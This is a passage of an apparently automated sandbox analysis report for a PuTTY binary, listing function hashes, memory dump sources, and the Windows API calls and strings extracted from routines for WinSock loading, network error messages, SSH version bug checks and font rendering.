                            • API String ID:
                            • Opcode ID: e4c8c92021fcc082639fd5c1ae03917af6145da088b7dfce1dbdb2318c3a99af
                            • Instruction ID: 079834548cc51b51bfd019a479ccc92eec805a88039a297de851100432da4a3c
                            • Opcode Fuzzy Hash: e4c8c92021fcc082639fd5c1ae03917af6145da088b7dfce1dbdb2318c3a99af
                            • Instruction Fuzzy Hash: D6F17C309082A08FD709CF6AC494955FFF2BFCA20170F82DAC9985B776D274E651CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e50cecb4ad6658f238277ce681a6afa366a85b76090eacef05d77aea46da1a22
                            • Instruction ID: 224edd11716e0e4dab7bb4aa1eb53d82be020215d79532cfd1e24cd2232ed3f6
                            • Opcode Fuzzy Hash: e50cecb4ad6658f238277ce681a6afa366a85b76090eacef05d77aea46da1a22
                            • Instruction Fuzzy Hash: 5DF18C319082E08FD709CF6AD494855FFF2BF8A21671F82DAC5985B272D274E611CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 650355b8412d0519bb5ac948dc3d3b970d07268b843e489542abfe3d5113f539
                            • Instruction ID: e8bfb86d21b786ab1c6b535fce6cb3231788548df1bc13e3bec6f07a1143178b
                            • Opcode Fuzzy Hash: 650355b8412d0519bb5ac948dc3d3b970d07268b843e489542abfe3d5113f539
                            • Instruction Fuzzy Hash: E7C15D309082A08FD709CF6AC494915FFF2AFCA21170EC2DAC9985F776D274E651CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a689629c8e97bd3cc9fe2faa06ec1ef2db411bd39b9801d26720caa29e54449
                            • Instruction ID: 8e3ee696bfc779c250a551e12898ac2707f4b1b149fc0774b199639d18f6d638
                            • Opcode Fuzzy Hash: 3a689629c8e97bd3cc9fe2faa06ec1ef2db411bd39b9801d26720caa29e54449
                            • Instruction Fuzzy Hash: C7C18D319082E08FD709CF6AD498915FFF2AFCA21670EC2DAC5985B272D274E611CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19b10c0d73ec524116e2bb0007ab09f93da274efe7fdeb6d9585fb537b82d489
                            • Instruction ID: 78ea0dc1cdccaf1bc5b89f3359d41e91439f0a8d090c6da63d35cb88eeea6c70
                            • Opcode Fuzzy Hash: 19b10c0d73ec524116e2bb0007ab09f93da274efe7fdeb6d9585fb537b82d489
                            • Instruction Fuzzy Hash: A0D1D4B49042549FCB59CF59C4D0EE977B1BF88319F1AC2AEEE450B366CA386611DF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 082ee27dfe711368faf717c052b675ab06165afb6141c09b4a78c84971212315
                            • Instruction ID: 65791d0cf7f4bec9302ca57d5e3549789cd5abce8000e314e2070109238461e1
                            • Opcode Fuzzy Hash: 082ee27dfe711368faf717c052b675ab06165afb6141c09b4a78c84971212315
                            • Instruction Fuzzy Hash: D7D1D4B49042549FCB59CF59C4D0EE977B1BF88319F1AC2AEEE450B366CA386611DF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c3481ff6b4377d5063495f535818619a54534096dc44124fe63a5e04a6fc3315
                            • Instruction ID: 37d7982de456ee5e264339637626e2b86ccce982173cff19eb4bfa5758b039c5
                            • Opcode Fuzzy Hash: c3481ff6b4377d5063495f535818619a54534096dc44124fe63a5e04a6fc3315
                            • Instruction Fuzzy Hash: 9781D670A00B128FD728CF29E8D06A6B7F1FF44314F548A2ED59AC7791D778A446CB49
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a998814c04915718bceffebfe4ee9064d6b4905f0bc2b9b92969892ca080efee
                            • Instruction ID: 36778a15160c27a989870d5f4509bff89229306420d9d262bc66c3c0d7bbd7fd
                            • Opcode Fuzzy Hash: a998814c04915718bceffebfe4ee9064d6b4905f0bc2b9b92969892ca080efee
                            • Instruction Fuzzy Hash: D48160319082A08FD705CF6AC498955FFF2AFCA211B0FC2DAC9984F776D274A651CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a45d1dcf2fcd590b121f6d636e7c2d9dee81bce3ba13f3457008039931ec636
                            • Instruction ID: f4dcf962c6c80b4265d10fb980ca86a2546b116ec14f5e38a544d865d7994fdd
                            • Opcode Fuzzy Hash: 6a45d1dcf2fcd590b121f6d636e7c2d9dee81bce3ba13f3457008039931ec636
                            • Instruction Fuzzy Hash: E181AF319082E08FD705CF6AD898915FFF2AFCA21670EC2DAD5884F376D274A611CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cffc44abd6f6c455f29a65bc4a8f716a3c4347af84c532b51f994b5dfd45d903
                            • Instruction ID: 89001ab5d9d331f9a014c17f2cb932ccd17e8797e508cf32392fcecf66704c69
                            • Opcode Fuzzy Hash: cffc44abd6f6c455f29a65bc4a8f716a3c4347af84c532b51f994b5dfd45d903
                            • Instruction Fuzzy Hash: BB61CA76E01218EFDB04CF89D48159DBBB5EF88354F6681AAD905BB351C6B0AE41CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 827ca85d424c1d2da1841154fcfc11b39ad3ea72475d3e97ed38a5312f09a816
                            • Instruction ID: 3f05baa4cb9ec7ec66ef36bc1a5dc2183d04bdbf0165ca5ecd9b7cdd63f5e94f
                            • Opcode Fuzzy Hash: 827ca85d424c1d2da1841154fcfc11b39ad3ea72475d3e97ed38a5312f09a816
                            • Instruction Fuzzy Hash: 3121F8329002049FDB10EF69C8D49ABBBA5FF44320B05816AED568B256D734FA19CBE4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction ID: d1f3927563bd85d822164bcd1084eab5ef076bc2f6551c05535f5f770a9a800c
                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction Fuzzy Hash: E0117DF760304143F6C4867EE9F46B7A796EBC632172D437BC0464B758D22AD841A60C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetProcAddress.KERNEL32(?,getaddrinfo), ref: 00446936
                            • GetProcAddress.KERNEL32(75340000,getaddrinfo), ref: 00446947
                            • GetProcAddress.KERNEL32(75340000,freeaddrinfo), ref: 00446965
                            • GetProcAddress.KERNEL32(75340000,getnameinfo), ref: 00446983
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004469B9
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 004469CF
                            • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 004469ED
                            • GetProcAddress.KERNEL32(00000000,gai_strerror), ref: 00446A0B
                            • GetProcAddress.KERNEL32(75340000,WSAAddressToStringA), ref: 00446A2F
                            • GetProcAddress.KERNEL32(75340000,WSAAsyncSelect), ref: 00446A4D
                            • GetProcAddress.KERNEL32(75340000,WSAEventSelect), ref: 00446A6B
                            • GetProcAddress.KERNEL32(75340000,select), ref: 00446A89
                            • GetProcAddress.KERNEL32(75340000,WSAGetLastError), ref: 00446AA7
                            • GetProcAddress.KERNEL32(75340000,WSAEnumNetworkEvents), ref: 00446AC5
                            • GetProcAddress.KERNEL32(75340000,WSAStartup), ref: 00446AE3
                            • GetProcAddress.KERNEL32(75340000,WSACleanup), ref: 00446B01
                            • GetProcAddress.KERNEL32(75340000,closesocket), ref: 00446B1F
                            • GetProcAddress.KERNEL32(75340000,ntohl), ref: 00446B3D
                            • GetProcAddress.KERNEL32(75340000,htonl), ref: 00446B5B
                            • GetProcAddress.KERNEL32(75340000,htons), ref: 00446B79
                            • GetProcAddress.KERNEL32(75340000,ntohs), ref: 00446B97
                            • GetProcAddress.KERNEL32(75340000,gethostbyname), ref: 00446BD3
                            • GetProcAddress.KERNEL32(75340000,getservbyname), ref: 00446BF1
                            • GetProcAddress.KERNEL32(75340000,inet_addr), ref: 00446C0F
                            • GetProcAddress.KERNEL32(75340000,inet_ntoa), ref: 00446C2D
                            • GetProcAddress.KERNEL32(75340000,connect), ref: 00446C4B
                            • GetProcAddress.KERNEL32(75340000,bind), ref: 00446C69
                            • GetProcAddress.KERNEL32(75340000,setsockopt), ref: 00446C87
                            • GetProcAddress.KERNEL32(75340000,socket), ref: 00446CA5
                            • GetProcAddress.KERNEL32(75340000,listen), ref: 00446CC3
                            • GetProcAddress.KERNEL32(75340000,send), ref: 00446CE1
                            • GetProcAddress.KERNEL32(75340000,shutdown), ref: 00446CFF
                            • GetProcAddress.KERNEL32(75340000,ioctlsocket), ref: 00446D1D
                            • GetProcAddress.KERNEL32(75340000,accept), ref: 00446D3B
                            • GetProcAddress.KERNEL32(75340000,recv), ref: 00446D59
                            • GetProcAddress.KERNEL32(75340000,WSAIoctl), ref: 00446D77
                              • Part of subcall function 004468BB: WSAStartup.WS2_32(?,004769F0), ref: 004468CC
                            • GetProcAddress.KERNEL32(75340000,gethostname), ref: 00446BB5
                              • Part of subcall function 00441074: MessageBoxA.USER32(00000000,?,00000010), ref: 004410AD
                              • Part of subcall function 00441074: MessageBoxA.USER32(00000000,?,00001010), ref: 004410FE
                              • Part of subcall function 00441074: IsZoomed.USER32 ref: 0044111F
                              • Part of subcall function 00441074: GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                              • Part of subcall function 00441074: SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            Similarity
                            • API ID: AddressProc$LongMessageWindow$StartupZoomed
                            • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$gai_strerror$getaddrinfo$gethostbyname$gethostname$getnameinfo$getservbyname$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$wship6.dll$wsock32.dll
                            • API String ID: 2174033337-3986585476
                            • Opcode ID: ec28c4c4fc4855fc888beca18ff46f43a2c0ecdcf740dd598c90a0fc7d492ad2
                            • Instruction ID: a6785391484e933862044740171b58c88fdbd980a089bdef6c7874fce9c2ab35
                            • Opcode Fuzzy Hash: ec28c4c4fc4855fc888beca18ff46f43a2c0ecdcf740dd598c90a0fc7d492ad2
                            • Instruction Fuzzy Hash: D8D1EBF1A48691DFE754DF68ACD5A253BE8B306704362043BE14DE3261D77C98848F5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strcat.LIBCMT ref: 0044704A
                            • _strlen.LIBCMT ref: 00447052
                            • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000400,?,0001000F,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 00447076
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00448076,00000000,00000000,00000000,?,0043DB69), ref: 00447080
                            • _strlen.LIBCMT ref: 004470A2
                            • _strlen.LIBCMT ref: 004470C0
                            Strings
                            • Network error: Permission denied, xrefs: 00446E91
                            • Network error: Protocol not supported, xrefs: 00446FA9
                            • Network error: No buffer space available, xrefs: 00446F63
                            • Network error: Operation already in progress, xrefs: 00446EB9
                            • Network error: Network is down, xrefs: 00446F45
                            • Network error: Interrupted function call, xrefs: 00446F13
                            • Windows error code %d (and FormatMessage returned %d), xrefs: 0044708F
                            • Network error: Cannot send after socket shutdown, xrefs: 00446FBD
                            • Network error: Cannot assign requested address, xrefs: 00446EA5
                            • Network error: Network is unreachable, xrefs: 00446F59
                            • Network error: Software caused connection abort, xrefs: 00446EC3
                            • Network error: Connection timed out, xrefs: 00446FD1
                            • Network error: Destination address required, xrefs: 00446EE1
                            • Network error: Address family not supported by protocol family, xrefs: 00446EAF
                            • Network error: No route to host, xrefs: 00446EFF
                            • Network error: Protocol family not supported, xrefs: 00446F95
                            • Network error: Invalid argument, xrefs: 00446F1D
                            • Network error: Network dropped connection on reset, xrefs: 00446F4F
                            • Network error: Socket type not supported, xrefs: 00446FC7
                            • Network error: Connection reset by peer, xrefs: 00446ED7
                            • Network error: Operation now in progress, xrefs: 00446F09
                            • Network error: Too many processes, xrefs: 00446F9F
                            • Network error: Bad address, xrefs: 00446EEB
                            • Network error: Host is down, xrefs: 00446EF5
                            • Network error: , xrefs: 00446E69
                            • Network error: Socket is not connected, xrefs: 00446F77
                            • Network error: Resource temporarily unavailable, xrefs: 00446FDB
                            • Network error: Socket is already connected, xrefs: 00446F27
                            • Network error: Protocol wrong type for socket, xrefs: 00446FB3
                            • Network error: Connection refused, xrefs: 00446ECD
                            • Network error: Address already in use, xrefs: 00446E9B
                            • Network error: Operation not supported, xrefs: 00446F8B
                            • Network error: Message too long, xrefs: 00446F3B
                            • Network error: Too many open files, xrefs: 00446F31
                            • Network error: Socket operation on non-socket, xrefs: 00446F81
                            • Network error: Graceful shutdown in progress, xrefs: 00446FE5
                            • Network error: Bad protocol option, xrefs: 00446F6D
                            Similarity
                            • API ID: _strlen$ErrorFormatLastMessage_strcat
                            • String ID: Network error: $Network error: Address already in use$Network error: Address family not supported by protocol family$Network error: Bad address$Network error: Bad protocol option$Network error: Cannot assign requested address$Network error: Cannot send after socket shutdown$Network error: Connection refused$Network error: Connection reset by peer$Network error: Connection timed out$Network error: Destination address required$Network error: Graceful shutdown in progress$Network error: Host is down$Network error: Interrupted function call$Network error: Invalid argument$Network error: Message too long$Network error: Network dropped connection on reset$Network error: Network is down$Network error: Network is unreachable$Network error: No buffer space available$Network error: No route to host$Network error: Operation already in progress$Network error: Operation not supported$Network error: Operation now in progress$Network error: Permission denied$Network error: Protocol family not supported$Network error: Protocol not supported$Network error: Protocol wrong type for socket$Network error: Resource temporarily unavailable$Network error: Socket is already connected$Network error: Socket is not connected$Network error: Socket operation on non-socket$Network error: Socket type not supported$Network error: Software caused connection abort$Network error: Too many open files$Network error: Too many processes$Windows error code %d (and FormatMessage returned %d)
                            • API String ID: 4013000384-487510915
                            • Opcode ID: 3c316481ca994727aa0498853219e1374a61e929664c8b078f28b747429622dc
                            • Instruction ID: 64bfcea645b41ce40b399cece31816e7328067ab4295704862905616a6f3ef5b
                            • Opcode Fuzzy Hash: 3c316481ca994727aa0498853219e1374a61e929664c8b078f28b747429622dc
                            • Instruction Fuzzy Hash: A6516971B0E2009BF7205A58AA81E7666A5DB15704B20C53BB986CB281F36EDC43E75F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strcspn.LIBCMT ref: 0041243B
                            • _strcspn.LIBCMT ref: 00412451
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            Similarity
                            • API ID: ItemMessageSend$_strcspn_strlen$_strcat_wctomb_s
                            • String ID: * VShell$1.2.18$1.2.19$1.2.20$1.2.21$1.2.22$1.36 sshlib: GlobalScape$1.36_sshlib GlobalSCAPE$2.0.*$2.0.0*$2.0.10*$2.1 *$2.1.0*$2.2.0*$2.3.0*$Cisco-1.25$DigiSSH_2.0$OSU_1.4alpha3$OSU_1.5alpha4$OpenSSH_2.5.[0-3]*$OpenSSH_2.[0-2]*$OpenSSH_2.[0-4]*$OpenSSH_2.[5-9]*$OpenSSH_3.[0-2]*$Sun_SSH_1.0$Sun_SSH_1.0.1$We believe remote version can't handle SSH-1 RSA authentication$We believe remote version has SSH-1 ignore bug$We believe remote version has SSH-2 HMAC bug$We believe remote version has SSH-2 RSA padding bug$We believe remote version has SSH-2 ignore bug$We believe remote version has SSH-2 key-derivation bug$We believe remote version has SSH-2 public-key-session-ID bug$We believe remote version has SSH-2 rekey bug$We believe remote version has winadj bug$We believe remote version ignores SSH-2 maximum packet size$We believe remote version needs a plain SSH-1 password$WeOnlyDo-*
                            • API String ID: 3474295531-378046228
                            • Opcode ID: bd83cd5ba841beace80e55e09fcaa28893ab71604ac1b3c24a4efa51ae504a35
                            • Instruction ID: 8ed8046d5d91a07ae7258d775d29bda47397ed54fa8b829cb2f1d498c6077f0a
                            • Opcode Fuzzy Hash: bd83cd5ba841beace80e55e09fcaa28893ab71604ac1b3c24a4efa51ae504a35
                            • Instruction Fuzzy Hash: DFC13C3214D3413EFA292672BE97FAB67D9DB45729F20142FF941E01D2FEAEA850401D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0044C87A
                            • File: , xrefs: 0044C656
                            • (Press Retry to debug the application - JIT must be enabled), xrefs: 0044C89D
                            • Microsoft Visual C++ Runtime Library, xrefs: 0044C8B3
                            • Assertion failed: %s, file %s, line %d, xrefs: 0044C914
                            • Line: , xrefs: 0044C7A5
                            • Assertion failed!, xrefs: 0044C592
                            • ..\conf.c, xrefs: 0044C630
                            • Expression: , xrefs: 0044C7EA
                            • <program name unknown>, xrefs: 0044C5E6
                            • Program: , xrefs: 0044C5B5
                            Similarity
                            • API ID: _strlen$_strcat_strncat$FileModuleName_strncpy
                            • String ID: (Press Retry to debug the application - JIT must be enabled)$..\conf.c$<program name unknown>$Assertion failed!$Assertion failed: %s, file %s, line %d$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Microsoft Visual C++ Runtime Library$Program:
                            • API String ID: 518805579-843566327
                            • Opcode ID: 2eb2e6109f33a04c226582c9ae94043ef1aac793a6b714aa2df42a05d35ee133
                            • Instruction ID: 4527ec651a9889ef48e962ac0c916fc4ebf80cd094c52819e1deec2671ab16c5
                            • Opcode Fuzzy Hash: 2eb2e6109f33a04c226582c9ae94043ef1aac793a6b714aa2df42a05d35ee133
                            • Instruction Fuzzy Hash: F3A19C71D002197AEF21BBE1ECC5EAE73ACBB04308F1404ABF505E3152D639D6889B5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDC.USER32 ref: 0043DF9F
                            • GetDeviceCaps.GDI32(?,0000005A), ref: 0043DFC2
                            • MulDiv.KERNEL32(00000000), ref: 0043DFCF
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E038
                            • SelectObject.GDI32(?,00000000), ref: 0043E043
                            • GetTextMetricsA.GDI32(?,?), ref: 0043E050
                            • GetObjectA.GDI32(0000003C,00474C60), ref: 0043E063
                            • GetOEMCP.KERNEL32 ref: 0043E0D3
                            • TranslateCharsetInfo.GDI32(000000FF,?,00000001), ref: 0043E0E4
                            • GetCPInfo.KERNEL32(00000000,?), ref: 0043E100
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E154
                            • CreateCompatibleDC.GDI32(?), ref: 0043E15E
                            • CreateCompatibleBitmap.GDI32(?), ref: 0043E175
                            • SelectObject.GDI32(00000000,00000000), ref: 0043E180
                            • SelectObject.GDI32(00000000), ref: 0043E190
                            • SetTextAlign.GDI32(00000000,00000000), ref: 0043E198
                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0043E1A4
                            • SetBkColor.GDI32(00000000,00000000), ref: 0043E1AC
                            • SetBkMode.GDI32(00000000,00000002), ref: 0043E1B5
                            • ExtTextOutA.GDI32(00000000,00000000,00000000,00000002,00000000,0046BA20,00000001,00000000), ref: 0043E1C9
                            • GetPixel.GDI32(00000000,?,000000FF), ref: 0043E1EC
                            • SelectObject.GDI32(00000000,?), ref: 0043E20F
                            • DeleteObject.GDI32(?), ref: 0043E218
                            • DeleteDC.GDI32(00000000), ref: 0043E21F
                            • DeleteObject.GDI32 ref: 0043E236
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E28A
                            • SelectObject.GDI32(?,00000000), ref: 0043E2C1
                            • GetTextMetricsA.GDI32(?,?), ref: 0043E2D2
                            • ReleaseDC.USER32(?), ref: 0043E30C
                            • DeleteObject.GDI32 ref: 0043E326
                            • DeleteObject.GDI32 ref: 0043E34F
                            Similarity
                            • API ID: Object$CreateDeleteSelectText$Font$ColorCompatibleInfoMetrics$AlignBitmapCapsCharsetDeviceModePixelReleaseTranslate
                            • String ID:
                            • API String ID: 2935192848-0
                            • Opcode ID: e0d559aea080160600912080f37a1959aa2a67ad54928d334d5699faafeb1b44
                            • Instruction ID: 5933931f3f294e87d1727512b3c925d3e2fabde184893f35575f437d716fb038
                            • Opcode Fuzzy Hash: e0d559aea080160600912080f37a1959aa2a67ad54928d334d5699faafeb1b44
                            • Instruction Fuzzy Hash: 7DD1AD71505314EFDB218F62EC89AAB3FA9FB08751F10453AF919C62A1CB74C891CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • Connection refused, xrefs: 0040D0CF
                            • Network unreachable, xrefs: 0040D0C1
                            • Proxy error: SOCKS proxy did not accept our authentication, xrefs: 0040CF1D
